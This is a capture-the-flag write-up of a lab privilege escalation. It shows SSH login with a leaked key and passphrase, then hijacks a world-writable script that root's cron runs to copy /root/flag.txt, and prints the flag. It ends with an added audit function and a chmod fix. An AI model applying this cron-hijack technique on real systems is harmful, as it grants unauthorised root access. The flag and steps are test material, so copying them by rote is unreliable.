2 CNC Elevation
Tags: Redteam, Solved
DESCRIPTION
Great, now you have access to the hackers' command & control server.
But you probably need higher-level access to find more valuable information.
QUESTION
Escalate privileges to root on the command & control server at 10.12.32.130 and read the flag from /root/flag.txt.
SOLUTION
CNC ACCESS has the id_rsa file (also in ~/Backup/home/max/id_rsa on kali 100); the SSH key passphrase is qwerty.
```shell
ssh -i id_rsa max@10.12.32.130
```
```shell
max@command_control_SRV1:~$ ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.9  55064 19644 ?        Ss   Nov16   0:35 /usr/bin/python /usr/bin/supervisord -c /etc/supervisor.conf
root         9  0.0  0.9 353760 19796 ?        S    Nov16   0:00 smbd --foreground --log-stdout
root        14  0.0  0.1  28356  2516 ?        Ss   Nov16   0:01 cron
syslog      18  0.0  0.1 191324  3768 ?        Ssl  Nov16   0:01 rsyslogd
root        21  0.0  0.1  72304  4048 ?        Ss   Nov16   0:00 /usr/sbin/sshd
root        24  0.0  0.2 342052  5912 ?        S    Nov16   0:00 smbd --foreground --log-stdout
root        25  0.0  0.2 342076  6116 ?        S    Nov16   0:00 smbd --foreground --log-stdout
root     11052  0.0  0.3 103856  7180 ?        Ss   12:15   0:00 sshd: max [priv]
max      11063  0.0  0.1 103856  3384 ?        S    12:15   0:00 sshd: max@pts/0
max      11064  0.0  0.1  20256  3788 pts/0    Ss   12:15   0:00 -bash
max      11078  0.0  0.1  36152  3124 pts/0    R+   12:16   0:00 ps aux
```
```shell
# /etc/crontab
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /etc/backup.sh >/dev/null 2>&1
```
```shell
max@command_control_SRV1:~$ cat /etc/backup.sh
#!/bin/bash
# Back up the credentials for the system. Just in case
zip -e --password computer /share/credz_backup.zip -u /etc/passwd /etc/shadow /home/max/id_rsa
# max, change the passwords after initial testing
max@command_control_SRV1:~$ ls -hal /etc/backup.sh
-rwxrw-rw- 1 root root 214 Nov 10 19:34 /etc/backup.sh
```
World-writable backup.sh, which root's cron runs every minute; modified it to copy the flag (and a listing of /root) into /tmp :)
```shell
max@command_control_SRV1:~$ cat /etc/backup.sh
#!/bin/bash
# Back up the credentials for the system. Just in case
zip -e --password computer /share/credz_backup.zip -u /etc/passwd /etc/shadow /home/max/id_rsa
cp /root/flag.txt /tmp/flag.txt
ls -hal /root > /tmp/ls.txt
# max, change the passwords after initial testing
max@command_control_SRV1:~$ cd /tmp
max@command_control_SRV1:/tmp$ cat flag.txt
Flag: 882ff42e-83d0-4cbd-8d3f-c2df2fea5442
```
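The root cause here is a root cron job pointing at a file with mode -rwxrw-rw-. The following audit function is an added example, not part of the original write-up: it lists every file referenced by a root entry in a system-format crontab that is group- or world-writable or not owned by the trusted uid. The function name and its ROOT_PREFIX and TRUSTED_UID parameters are assumptions of this example.

```shell
#!/bin/sh
# Added example: find root cron targets that a non-root user could rewrite.
# usage: audit_crontab CRONTAB [ROOT_PREFIX] [TRUSTED_UID]
#   ROOT_PREFIX  (hypothetical) prepended to each path, for mounted images/fixtures
#   TRUSTED_UID  (hypothetical) numeric owner considered safe, default 0
audit_crontab() {
  ac_file=$1 ac_prefix=${2:-} ac_uid=${3:-0}
  set -f                                   # keep cron's "*" fields from globbing
  while read -r m h dom mon dow user cmd; do
    case $m in ''|'#'*|*=*) continue ;; esac          # blanks, comments, VAR=value
    # "@reboot user cmd" style lines have one schedule field instead of five.
    case $m in @*) cmd="$dom $mon $dow $user $cmd"; user=$h ;; esac
    [ "$user" = root ] || continue
    for word in $cmd; do
      case $word in /*) ;; *) continue ;; esac         # absolute paths only
      [ -f "$ac_prefix$word" ] || continue             # skips "/" and missing files
      # ls -ldn fields: $1 = mode string, $3 = numeric owner uid
      set -- $(ls -ldn "$ac_prefix$word")
      reason=
      case $1 in ?????w*) reason="group-writable" ;; esac
      case $1 in ????????w*) reason="world-writable" ;; esac
      [ "$3" = "$ac_uid" ] || reason="${reason:+$reason, }owner uid $3"
      if [ -n "$reason" ]; then
        echo "FINDING $word $1 ($reason)"
      fi
    done
  done < "$ac_file"
  set +f
}

# When run as a script with arguments, audit the given crontab.
if [ "$#" -gt 0 ]; then audit_crontab "$@"; fi
```

Running `audit_crontab /etc/crontab` on a host with the configuration shown above would report /etc/backup.sh; the fix is `chmod 755` (or stricter) on the script and on any directory in its path that non-root users can write to.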